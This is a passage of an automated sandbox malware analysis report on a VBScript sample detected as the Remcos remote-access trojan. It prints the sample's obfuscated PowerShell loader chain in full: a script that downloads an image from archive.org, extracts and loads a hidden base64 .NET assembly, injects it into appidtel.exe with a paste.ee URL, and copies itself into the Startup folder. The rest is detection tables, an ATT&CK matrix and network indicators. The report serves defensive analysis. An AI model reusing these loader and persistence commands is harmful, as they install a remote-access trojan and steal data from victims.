{1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\logistics1.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.etnarugif.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwgpsankyd7mccrj31odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8nkycymdi0mtavrgv0ywhob3rlx1yuanbnihswftt7mx13zwjdbgllbnqgpsankydozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltywdlqnl0zxmgpsb7mx13zwjdbgllbnqurg93bmxvywreyxrhkhsxfwltywdlvxinkydsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllrlehqurw5jb2rpbmcnkyddojpvvey4lkdldfn0cmluzygnkyd7mx1pbwfnzuj5dgvzktsnkyd7mx1zdgfydezsywcnkycgpsb7mh08jysnpejbu0u2nf9tveenkydsvd4+ezankyd9o3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnsnkycwftt7mx1zdccrj2fydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9iccrj3sxfwltywdlvgv4dc5jbmrlee9mkhsxfscrj2vuzezsywcpo3sxfxn0yxj0sw5kzxgglwdlidaglwfuzcb7mx1lbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7ezf9ymfzzty0tgvuz3roid0gezf9zw5ksw5kzxgglsb7mx1zjysndgfydeluzgv4o3sxfscrj2jhjysncycrj2u2nenvbw0nkydhbmqgpsb7mx1pbwfnzvrlehquuycrj3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dccrj2vzjysnid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbccrj2vjdglvbi5bc3nlbwinkydsev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfscrjyk7ezf9dmfptwv0ag9klkludm9rzsh7mx1udscrj2xslcbakhswftavmkdmmkevzc9lzs5ldhnhcc8vonnwdhroezb9lcb7mh1kzxnhdgl2ywrvezb9lcb7mh1kzxnhdgl2ywrvezb9lcb7mccrj31kzscrj3nhdgl2ywrvezb9lcb7mh1kzxnhdgl2ywrvezb9lcb7mh0xezb9lcb7mh1hchbpzhrlbhswfskpoycpic1mw0niqvjdmzksw0niqvjdmzypfc4oichbc3ryau5nxsr2zvjcb3nluhjfzkvyzw5jrslbmswzxssnecctsm9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/detahnote_v.jpg {0};{1}webclient = '+'new-object system.net.webclient;{1}imagebytes = {1}webclient.downloaddata({1}imageur'+'l);{1}imagetext = [system.text.encoding'+']::utf8.getstring('+'{1}imagebytes);'+'{1}startflag'+' = {0}<'+'<base64_sta'+'rt>>{0'+'};{1}endflag = {0}<<base64_end>>{'+'0};{1}st'+'artindex = {1}imagetext.indexof({1}startflag);{1}endindex = '+'{1}imagetext.indexof({1}'+'endflag);{1}startindex -ge 0 -and {1}endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{1}base64length = {1}endindex - {1}s'+'tartindex;{1}'+'ba'+'s'+'e64comm'+'and = {1}imagetext.s'+'ubstring({1}startindex, {1}base64length);{1}commandbyt'+'es'+' = [system.convert]::frombase64string({1}base64command);{1}loadedassembly = [system.refl'+'ection.assemb'+'ly]::load({1}commandbytes);{1}vaimethod = [dnlib.io.home].getmethod({0}vai{0}'+');{1}vaimethod.invoke({1}nu'+'ll, @({0}0/2gf2a/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[char]39,[char]36)|.( ([string]$verbosepreference)[1,3]+'x'-join'')"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\logistics1.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.etnarugif.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwgpsankyd7mccrj31odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8nkycymdi0mtavrgv0ywhob3rlx1yuanbnihswftt7mx13zwjdbgllbnqgpsankydozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltywdlqnl0zxmgpsb7mx13zwjdbgllbnqurg93bmxvywreyxrhkhsxfwltywdlvxinkydsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllrlehqurw5jb2rpbmcnkyddojpvvey4lkdldfn0cmluzygnkyd7mx1pbwfnzuj5dgvzktsnkyd7mx1zdgfydezsywcnkycgpsb7mh08jysnpejbu0u2nf9tveenkydsvd4+ezankyd9o3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnsnkycwftt7mx1zdccrj2fydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9iccrj3sxfwltywdlvgv4dc5jbmrlee9mkhsxfscrj2vuzezsywcpo3sxfxn0yxj0sw5kzxgglwdlidaglwfuzcb7mx1lbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7ezf9ymfzzty0tgvuz3roid0gezf9zw5ksw5kzxgglsb7mx1zjysndgfydeluzgv4o3sxfscrj2jhjysncycrj2u2nenvbw0nkydhbmqgpsb7mx1pbwfnzvrlehquuycrj3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dccrj2vzjysnid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbccrj2vjdglvbi5bc3nlbwinkydsev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfscrjyk7ezf9dmfptwv0ag9klkludm9rzsh7mx1udscrj2xslcbakhswftavmkdmmkevzc9lzs5ldhnhcc8vonnwdhroezb9lcb7mh1kzxnhdgl2ywrvezb9lcb7mh1kzxnhdgl2ywrvezb9lcb7mccrj31kzscrj3nhdgl2ywrvezb9lcb7mh1kzxnhdgl2ywrvezb9lcb7mh0xezb9lcb7mh1hchbpzhrlbhswfskpoycpic1mw0niqvjdmzksw0niqvjdmzypfc4oichbc3ryau5nxsr2zvjcb3nluhjfzkvyzw5jrslbmswzxssnecctsm9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/detahnote_v.jpg {0};{1}webclient = '+'new-object system.net.webclient;{1}imagebytes = {1}webclient.downloaddata({1}imageur'+'l);{1}imagetext = [system.text.encoding'+']::utf8.getstring('+'{1}imagebytes);'+'{1}startflag'+' = {0}<'+'<base64_sta'+'rt>>{0'+'};{1}endflag = {0}<<base64_end>>{'+'0};{1}st'+'artindex = {1}imagetext.indexof({1}startflag);{1}endindex = '+'{1}imagetext.indexof({1}'+'endflag);{1}startindex -ge 0 -and {1}endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{1}base64length = {1}endindex - {1}s'+'tartindex;{1}'+'ba'+'s'+'e64comm'+'and = {1}imagetext.s'+'ubstring({1}startindex, {1}base64length);{1}commandbyt'+'es'+' = [system.convert]::frombase64string({1}base64command);{1}loadedassembly = [system.refl'+'ection.assemb'+'ly]::load({1}commandbytes);{1}vaimethod = [dnlib.io.home].getmethod({0}vai{0}'+');{1}vaimethod.invoke({1}nu'+'ll, @({0}0/2gf2a/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[char]39,[char]36)|.( ([string]$verbosepreference)[1,3]+'x'-join'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts11
            Command and Scripting Interpreter
            221
            Scripting
            211
            Process Injection
            31
            Virtualization/Sandbox Evasion
            OS Credential Dumping21
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            211
            Process Injection
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell
            Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets1
            Remote System Discovery
            SSHKeylogging3
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            File and Directory Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
            System Information Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530595 Sample: Logistics1.vbs Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 33 paste.ee 2->33 35 ia600102.us.archive.org 2->35 53 Multi AV Scanner detection for domain / URL 2->53 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 61 10 other signatures 2->61 9 wscript.exe 1 2->9         started        signatures3 59 Connects to a pastebin service (likely for C&C) 33->59 process4 signatures5 63 VBScript performs obfuscated calls to suspicious functions 9->63 65 Suspicious powershell command line found 9->65 67 Wscript starts Powershell (via cmd or directly) 9->67 69 3 other signatures 9->69 12 cmd.exe 1 9->12         started        15 powershell.exe 7 9->15         started        process6 signatures7 71 Wscript starts Powershell (via cmd or directly) 12->71 73 Uses ping.exe to sleep 12->73 75 Uses ping.exe to check the status of other devices and networks 12->75 17 powershell.exe 7 12->17         started        20 PING.EXE 1 12->20         started        23 conhost.exe 12->23         started        77 Suspicious powershell command line found 15->77 79 Obfuscated command line found 15->79 25 powershell.exe 14 15 15->25         started        27 conhost.exe 15->27         started        process8 dnsIp9 43 Suspicious powershell command line found 17->43 45 Obfuscated command line found 17->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 17->47 37 127.0.0.1 unknown unknown 20->37 39 ia600102.us.archive.org 207.241.227.242, 443, 49706 INTERNET-ARCHIVEUS United States 25->39 41 paste.ee 188.114.96.3, 443, 49708 CLOUDFLARENETUS European Union 25->41 49 Writes to foreign memory regions 25->49 51 Injects a PE file into a foreign processes 25->51 29 appidtel.exe 25->29         started        31 appidtel.exe 25->31         started        signatures10 process11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Logistics1.vbs6%VirustotalBrowse
            Logistics1.vbs5%ReversingLabsScript-WScript.Trojan.RemcosRAT
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            ia600102.us.archive.org0%VirustotalBrowse
            paste.ee3%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore60%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://oneget.org0%URL Reputationsafe
            http://paste.ee3%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg8%VirustotalBrowse
            https://paste.ee1%VirustotalBrowse
            https://ia600102.us.archive.org0%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            http://ia600102.us.archive.org0%VirustotalBrowse
            https://analytics.paste.ee1%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            https://cdnjs.cloudflare.com0%VirustotalBrowse
            https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX0%VirustotalBrowse
            https://ia600102.us.archive.org/32/it0%VirustotalBrowse
            https://themes.googleusercontent.com0%VirustotalBrowse
            https://secure.gravatar.com0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            ia600102.us.archive.org
            207.241.227.242
            truetrueunknown
            paste.ee
            188.114.96.3
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgtrueunknown
            https://paste.ee/d/A2fG2/0true
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1613032778.0000021AE80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.1613032778.0000021AE7E6B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://i0002.uspowershell.exe, 00000008.00000002.1612225136.0000021AE49A7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1613032778.0000021AE8061000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://paste.eepowershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1613032778.0000021AE8061000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000008.00000002.1613032778.0000021AE7747000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.google.com;powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://analytics.paste.eepowershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://paste.eepowershell.exe, 00000008.00000002.1613032778.0000021AE6B6F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://aka.ms/pscore6powershell.exe, 00000005.00000002.1517721610.0000019C59E8A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ia600102.us.arXpowershell.exe, 00000008.00000002.1613032778.0000021AE7E19000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://ia600102.us.archive.orgpowershell.exe, 00000008.00000002.1613032778.0000021AE7D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmptrueunknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1613032778.0000021AE8061000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://ia600102.us.archive.org/32/items/detah-note-v_powershell.exe, 00000008.00000002.1612130354.0000021AE48C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmptrue
                      unknown
                      http://ia600102.us.archive.orgpowershell.exe, 00000008.00000002.1613032778.0000021AE7E1F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://www.google.compowershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://contoso.com/powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1613032778.0000021AE80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1648832877.0000021AF67CD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://oneget.orgXpowershell.exe, 00000008.00000002.1613032778.0000021AE7E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://analytics.paste.ee;powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.1517721610.0000019C59EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774942207.000002024DBBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774942207.000002024DBAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6751000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1517721610.0000019C59EDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1774942207.000002024DB83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6751000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://ia600102.us.archive.org/32/itpowershell.exe, 00000006.00000002.1774942207.000002024E09D000.00000004.00000800.00020000.00000000.sdmptrueunknown
                          https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgXpowershell.exe, 00000008.00000002.1613032778.0000021AE7D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1613032778.0000021AE6972000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://secure.gravatar.compowershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://themes.googleusercontent.compowershell.exe, 00000008.00000002.1613032778.0000021AE6CE3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://oneget.orgpowershell.exe, 00000008.00000002.1613032778.0000021AE7E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          188.114.96.3
                          paste.eeEuropean Union
                          13335CLOUDFLARENETUStrue
                          207.241.227.242
                          ia600102.us.archive.orgUnited States
                          7941INTERNET-ARCHIVEUStrue
                          IP
                          127.0.0.1
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1530595
                          Start date and time:2024-10-10 09:27:51 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
